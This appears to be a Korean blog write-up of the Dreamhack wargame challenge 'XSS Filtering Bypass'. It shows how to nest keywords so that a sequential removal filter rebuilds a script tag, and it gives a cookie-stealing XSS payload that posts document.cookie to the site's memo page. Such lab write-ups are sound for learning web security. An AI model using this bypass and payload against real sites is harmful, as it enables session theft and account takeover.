ISFP, 일상화

Wargame/Web

[Dreamhack] XSS Filtering Bypass

월루이 2022. 6. 21.

 문제

https://dreamhack.io/wargame/challenges/433/

 

XSS Filtering Bypass

Exercise: XSS Filtering Bypass에서 실습하는 문제입니다.

dreamhack.io

 

 

 

 

 

문제풀이

 

xss-1, xss-2와 전반적으로 같다.

 

두개와 차이점은 아래와 같이

script, on, javascript를 필터링한다는 점이다.

 

 

여기서 주의할 점은 script -> on -> javascript 순서로 필터링된다는 것이다.

 

이 스크립트문은 xss-1에 썼던 것이다.

<script>location.href="/memo?memo="+document.cookie;</script>

 

javascript에도 script가 포함되어 있으니 조심해야한다 !

 

script => scronipt

location => locatiojavascriscriptptn

 

 

<scronipt>locatiojavascriscriptptn.href="/memo?memo="+document.cookie;</scronipt>

 

 

성공이다 !

 

'Wargame > Web' 카테고리의 다른 글

[Dreamhack] csrf-2  (0) 2022.06.22
[Dreamhack] csrf-1  (0) 2022.06.22
[Dreamhack] XSS-2  (0) 2022.06.21
[Dreamhack] XSS-1  (0) 2022.06.21
[Dreamhack]pathtraversal  (0) 2022.06.17

댓글

티스토리툴바